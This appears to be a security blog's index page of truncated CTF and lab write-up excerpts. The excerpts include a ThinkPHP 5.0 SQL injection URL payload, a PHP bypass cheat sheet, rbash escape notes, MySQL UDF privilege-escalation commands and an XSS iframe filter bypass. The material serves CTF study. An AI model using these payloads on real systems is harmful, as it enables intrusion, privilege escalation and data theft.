iloveflag-blog

iloveflag-blog

iloveflag.com

hitcon-ctf-2017-ssrfme
某位老哥发我一道web题,搜了一下是hitconctf2017的题,话说以前在i春秋上做过HITCON2017(babyfirst-revenge)的题,质量都很好dockerfile:https://github.com/Pr0phet/hitconDockerfile/tree/master/hitcon-ctf-2017/ssrfme123456789101112<?php $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir(...
thinkphp5.0_sql_injection分析
payload:http://127.0.0.1/thinkphp5.0.15/public/index.php/index/index/index?password[0]=inc&password[1]=updatexml(1,concat(0x7e,version()),1)&password[2]=1 source:12345678910111213//index.php<?phpnamespace app\index\controller;use think\Db;class Index{ public function ...
de1tactf2019_ssrf_me
de1tactf2019_ssrf_me123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111#! /usr/bin/env python#encoding=utf-8from flask impo...
sql注入
联合查询与order by盲注Blind SQL InjectionsAbout Blind SQL InjectionsIn a quite good production application generally you can not see error responses on the page, so you can not extract data through Union attacks or error based attacks. You have to do use Blind SQL Injections attacks to extract data. The...
快速查询整理
快速查询整理文件泄漏.git .svn .DS_STOR vim泄漏 .index.php.swp 常见web文件泄漏: index.php~ index.phps www.zip www.tar.gz 常见危险函数strcmp:比较函数,数组绕过 extract:从用户可以控制的数组中导出变量时导致变量覆盖 parse_str:函数去变量解析存在带入未初始化的数据,可以进行url编码,变量覆盖漏洞 intval:取整函数绕过,payload:id=1024.1 ereg:%00截断 addslashes:宽字节注入%df吃掉 \ XFF:X-Forwarded-For: client...
rbash逃逸
restricted shell 与rbash什么是restricted shell?顾名思义是一个受限的shell,让用户只能执行一些网络管理员允许执行的命令,极大地控制了用户的权限,可分为rbash(The restricted mode of bash)ksh(Similarly the Korn shell’s restricted mode)rsh(The restricted mode of the Bourne shell sh)下面以rbash展开rbash是一个bash -r的软连接,可以rbash进入或者bash -r直接进入 rbash的配置在研究rbash逃逸之...
vulhub-learning
Raven11.利用python打开一个shell终端:sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’3.udf提取gcc -g -c 1518.cgcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lccreate table foo(line blob);insert into foo values(load_file(‘/var/www/html/1518.so’));select from foo into dumpfile ‘/usr/lib/mysql/plugin...
apache基于多ip的虚拟主机配置+文件服务器和账号密码
当前ip:172.19.16.219/24添加两个ip:ip addr add 172.19.16.220/24 dev eth0 ip addr add 172.19.16.221/24 dev eth0 在/var/ww/html/下创建web1,web2,web3目录配置/etc/httpd/conf/httpd.conf注释掉#DocumentRoot “/var/www/html”<VirtualHost 172.19.16.219:8080> ServerName web1.zmbxzrq.com DocumentRoot “/var/www/h...
pwn学习笔记
pwntools常用指令p64(int) 8个bite为一组,最小的放前面,依次排列u64(str) 上面的逆过程p32(int)u32(str)remote(host, port) / process(path).recv(int) 7 => Hello world! => ‘Hello w’.recvuntil(str) ‘or’ => Hello world! => ‘Hello wor’.recvline() === .recvuntil(‘\n’).send(str) ‘payload’ => ‘payload’.sendline(str) ‘...
2019西湖论剑web
web1进入首页发现include $_GET[‘file’]在底部发现提示用php伪协议读出源码base64解密后为123456<?php$a = @$_GET['dir'];if(!$a){$a = '/tmp';}var_dump(scandir($a));目录穿越发现flag回到首页读取flag web2xss,发现script被过滤了利用iframe标签加data base64编码绕过payload:1<iframe src="data:text/html...